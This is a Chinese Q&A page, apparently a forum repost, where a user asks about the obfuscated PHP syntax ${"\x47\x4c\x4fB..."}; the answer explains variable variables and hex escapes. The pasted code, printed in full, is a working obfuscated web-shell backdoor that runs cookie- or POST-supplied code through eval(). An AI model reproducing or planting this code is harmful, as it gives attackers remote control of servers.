如何解决到底是怎么回事?我从未见过这样的PHP语法:$ {“ \ x47 \ x4c \ x4fB \ x41 \ x4c \ x53”} ['v9800']
此php代码中有一些奇怪的语法:
<?php $hd701 = 475;$GLOBALS['xbe829'] = Array();global $xbe829;$xbe829 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800'] = "\x7a\x7b\x60\x5b\x4a\x56\x6c\x51\x21\x62\x38\x66\x44\xa\x2e\x27\x22\x50\x58\x45\x49\x3d\x79\x43\x23\x3b\x53\x29\x2a\x30\x6b\x73\x63\x9\x77\x6f\x47\x6a\x4e\x54\x39\x3f\x40\x4f\x35\x4b\x26\x34\x6d\x5d\x76\x3a\x3c\x64\x71\x67\x5e\x5c\x46\x6e\x75\x4c\xd\x42\x65\x52\x48\x70\x41\x68\x55\x2b\x57\x5a\x69\x7c\x20\x2c\x28\x74\x59\x3e\x2f\x37\x78\x33\x31\x7d\x61\x5f\x7e\x72\x2d\x24\x36\x25\x4d\x32";$xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]] = $xbe829['v9800'][32].$xbe829['v9800'][69].$xbe829['v9800'][91];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]] = $xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][53];$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]] = $xbe829['v9800'][31].$xbe829['v9800'][79].$xbe829['v9800'][91].$xbe829['v9800'][6].$xbe829['v9800'][64].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]] = $xbe829['v9800'][74].$xbe829['v9800'][59].$xbe829['v9800'][74].$xbe829['v9800'][89].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]] = $xbe829['v9800'][67].$xbe829['v9800'][69].$xbe829['v9800'][67].$xbe829['v9800'][50].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][31].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59];$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]] = $xbe829['v9800'][60].$xbe829['v9800'][59].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][74].$xbe829['v9800'][88].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][0].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]] = $xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][94].$xbe829['v9800'][47].$xbe829['v9800'][89].$xbe829['v9800'][53].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][35].$xbe829['v9800'][53].$xbe829['v9800'][64];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]] = $xbe829['v9800'][31].$xbe829['v9800'][64].$xbe829['v9800'][79].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][74].$xbe829['v9800'][79];$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]] = $xbe829['v9800'][31].$xbe829['v9800'][32].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][9];$xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]] = $xbe829['v9800'][69].$xbe829['v9800'][86].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][29].$xbe829['v9800'][83];$xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] = $_POST;$xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] = $_COOKIE;@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][89].$xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55],NULL);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][6].$xbe829['v9800'][35].$xbe829['v9800'][55].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][91].$xbe829['v9800'][91].$xbe829['v9800'][35].$xbe829['v9800'][91].$xbe829['v9800'][31],0);@$xbe829[$xbe829['v9800'][74].$xbe829['v9800'][47].$xbe829['v9800'][53].$xbe829['v9800'][83].$xbe829['v9800'][44]]($xbe829['v9800'][48].$xbe829['v9800'][88].$xbe829['v9800'][84].$xbe829['v9800'][89].$xbe829['v9800'][64].$xbe829['v9800'][84].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][60].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][35].$xbe829['v9800'][59].$xbe829['v9800'][89].$xbe829['v9800'][79].$xbe829['v9800'][74].$xbe829['v9800'][48].$xbe829['v9800'][64],0);@$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][47].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][11]](0);$x7bb89b70 = NULL;$t0e76b849 = NULL;$xbe829[$xbe829['v9800'][67].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][40].$xbe829['v9800'][47]] = $xbe829['v9800'][40].$xbe829['v9800'][44].$xbe829['v9800'][88].$xbe829['v9800'][64].$xbe829['v9800'][32].$xbe829['v9800'][88].$xbe829['v9800'][85].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][64].$xbe829['v9800'][53].$xbe829['v9800'][10].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][47].$xbe829['v9800'][10].$xbe829['v9800'][47].$xbe829['v9800'][83].$xbe829['v9800'][92].$xbe829['v9800'][40].$xbe829['v9800'][64].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][92].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][94].$xbe829['v9800'][86].$xbe829['v9800'][10].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][53].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][44].$xbe829['v9800'][47];global $p48307594;function h16107($x7bb89b70,$he719627){global $xbe829;$gea9ce = "";for ($t69c26=0; $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70);){for ($nb3186c8=0; $nb3186c8<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($he719627) && $t69c26<$xbe829[$xbe829['v9800'][54].$xbe829['v9800'][11].$xbe829['v9800'][83].$xbe829['v9800'][64].$xbe829['v9800'][44].$xbe829['v9800'][94]]($x7bb89b70); $nb3186c8++,$t69c26++){$gea9ce .= $xbe829[$xbe829['v9800'][32].$xbe829['v9800'][85].$xbe829['v9800'][11].$xbe829['v9800'][11].$xbe829['v9800'][94]]($xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($x7bb89b70[$t69c26]) ^ $xbe829[$xbe829['v9800'][74].$xbe829['v9800'][29].$xbe829['v9800'][86].$xbe829['v9800'][86]]($he719627[$nb3186c8]));}}return $gea9ce;}function scdbab($x7bb89b70,$he719627){global $xbe829;global $p48307594;return $xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($xbe829[$xbe829['v9800'][22].$xbe829['v9800'][29].$xbe829['v9800'][40].$xbe829['v9800'][9].$xbe829['v9800'][9].$xbe829['v9800'][85].$xbe829['v9800'][88].$xbe829['v9800'][53]]($x7bb89b70,$p48307594),$he719627);}foreach ($xbe829[$xbe829['v9800'][60].$xbe829['v9800'][83].$xbe829['v9800'][86].$xbe829['v9800'][9].$xbe829['v9800'][86].$xbe829['v9800'][86].$xbe829['v9800'][47].$xbe829['v9800'][9].$xbe829['v9800'][9]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}if (!$x7bb89b70){foreach ($xbe829[$xbe829['v9800'][88].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][85].$xbe829['v9800'][9].$xbe829['v9800'][44].$xbe829['v9800'][88]] as $he719627=>$y301fc25){$x7bb89b70 = $y301fc25;$t0e76b849 = $he719627;}}$x7bb89b70 = @$xbe829[$xbe829['v9800'][0].$xbe829['v9800'][64].$xbe829['v9800'][47].$xbe829['v9800'][94].$xbe829['v9800'][86]]($xbe829[$xbe829['v9800'][79].$xbe829['v9800'][9].$xbe829['v9800'][29].$xbe829['v9800'][83].$xbe829['v9800'][47]]($xbe829[$xbe829['v9800'][48].$xbe829['v9800'][97].$xbe829['v9800'][83].$xbe829['v9800'][44].$xbe829['v9800'][32]]($x7bb89b70),$t0e76b849));if (isset($x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]) && $p48307594==$x7bb89b70[$xbe829['v9800'][88].$xbe829['v9800'][30]]){if ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][74]){$t69c26 = Array($xbe829['v9800'][67].$xbe829['v9800'][50] => @$xbe829[$xbe829['v9800'][79].$xbe829['v9800'][64].$xbe829['v9800'][9].$xbe829['v9800'][88].$xbe829['v9800'][47].$xbe829['v9800'][64].$xbe829['v9800'][11].$xbe829['v9800'][97]](),$xbe829['v9800'][31].$xbe829['v9800'][50] => $xbe829['v9800'][86].$xbe829['v9800'][14].$xbe829['v9800'][29].$xbe829['v9800'][92].$xbe829['v9800'][86],);echo @$xbe829[$xbe829['v9800'][11].$xbe829['v9800'][44].$xbe829['v9800'][10].$xbe829['v9800'][10].$xbe829['v9800'][94].$xbe829['v9800'][44].$xbe829['v9800'][11]]($t69c26);}elseif ($x7bb89b70[$xbe829['v9800'][88]] == $xbe829['v9800'][64]){eval/*l551d*/($x7bb89b70[$xbe829['v9800'][53]]);}exit();} ?>
我特别好奇,这是什么样的语法?
${"\x47\x4c\x4fB\x41\x4c\x53"}['v9800']
解决方法
首先,为了解决代码语法本身,PHP允许您动态创建变量名。
假设您有一个变量:
$test = 123;
您可以像这样动态创建对此变量的引用:
echo ${'test'}; // Prints '123'
您为什么要这样做?好了,上面的示例毫无意义,但是假设您需要在运行时动态地运行一些变量名:
$var1 = 'A';
$var2 = 'B';
$var3 = 'C';
for ($i = 1; $i <= 3; $i++) {
echo ${'var' . $i};
}
// Prints 'ABC'
因此,既然我们知道语法的含义,\x47\x4c\x4fB\x41\x4c\x53
是什么意思?
\x
用于转义十六进制字符序列。简而言之,您显示的字符串是一堆有人用十六进制表示的字符,而不是您惯常看到的人类可读的ASCII字符。
如果我们摆脱了\x
转义部分,我们将得到:
474c4fB414c53
据我所知,此处的B
并不是十六进制的。这给我们留下了
474c4f 414c53
翻译为:
GLO ALS
如果我们替换B
,我们将得到:
GLOBALS
如果我们将其重新添加到动态变量引用中,然后再次查看代码,则会得到:
$GLOBALS['v9800']
这很有趣,因为$GLOBALS是PHP中可用的特殊数组,它可以访问全局范围内的所有变量。因此,从本质上讲,您的代码正在尝试访问名为$v9800
的全局变量。
您将不得不决定这对您的应用程序意味着什么,但是此代码可能是可疑的。可能是有人故意使用这种神秘的方法伪装了他们的代码,以尝试访问全局变量。
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。